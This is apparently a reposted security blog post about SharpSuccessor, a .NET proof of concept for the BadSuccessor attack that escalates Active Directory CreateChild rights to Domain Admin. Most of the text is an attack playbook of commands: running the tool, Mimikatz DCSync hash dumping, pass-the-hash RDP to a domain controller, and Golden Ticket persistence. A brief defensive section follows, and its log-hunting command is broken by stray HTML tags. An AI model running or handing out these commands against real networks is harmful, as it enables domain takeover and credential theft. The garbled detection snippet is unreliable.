SharpSuccessor: Weaponized NET Implementation of BadSuccessor Attack

Listen to this Post

Featured Image
SharpSuccessor is a .NET Proof of Concept (POC) that fully weaponizes Yuval Gordon’s BadSuccessor attack, enabling privilege escalation from “CreateChild” privileges to Domain Admin (DA). This tool allows for inline .NET execution, making it highly effective in adversary simulations.

GitHub Repository: SharpSuccessor by logangoins

You Should Know:

Prerequisites for the Attack

  • “CreateChild” privileges over any Organizational Unit (OU).
  • Active Directory (AD) environment with misconfigured delegation.
  • Execution via .NET (inline or compiled).

Key Commands & Execution Steps

1. Compile & Execute SharpSuccessor

 Clone the repository 
git clone https://github.com/logangoins/SharpSuccessor.git 
cd SharpSuccessor

Compile using .NET (if needed) 
dotnet build

Execute SharpSuccessor (inline execution) 
SharpSuccessor.exe --ou "TargetOU" --user "CompromisedUser" --domain "example.com" 

2. Verify Permissions (Pre-Attack)

 Check user privileges using PowerView 
Import-Module .\PowerView.ps1 
Get-ObjectAcl -Identity "TargetOU" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild" } 

3. Post-Exploitation (Domain Admin Access)

 Dump hashes using Mimikatz (after escalation) 
mimikatz.exe "lsadump::dcsync /domain:example.com /user:Administrator"

Lateral movement via RDP 
xfreerdp /v:DC01.example.com /u:Administrator /pth:NTLM_HASH 

4. Cleanup & Persistence (Optional)

 Remove malicious child objects 
Remove-ADObject -Identity "CN=MaliciousObject,OU=TargetOU,DC=example,DC=com" -Confirm:$false

Establish persistence via Golden Ticket 
mimikatz.exe "kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:HASH /ptt" 

What Undercode Say:

The SharpSuccessor tool demonstrates how misconfigured AD permissions can lead to full domain compromise. Organizations must:
– Audit OU delegation regularly.
– Restrict “CreateChild” privileges to necessary users only.
– Monitor for suspicious child object creation in critical OUs.

For defenders, detecting this attack requires:

 Hunt for unusual AD object modifications 
Get-WinEvent -LogName "Security" | ? { $<em>.Id -eq 5136 -and $</em>.Message -match "CreateChild" } 

Prediction:

As AD-based attacks evolve, more automated .NET/C tools like SharpSuccessor will emerge, making privilege escalation faster and harder to detect. Expect increased defensive tooling around OU delegation monitoring.

Expected Output:

  • Successful Domain Admin access via SharpSuccessor.
  • DCSync extraction of privileged accounts.
  • Defensive logs detecting OU modifications.

For more details, visit: SharpSuccessor GitHub.

References:

Reported By: Logan Goins – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram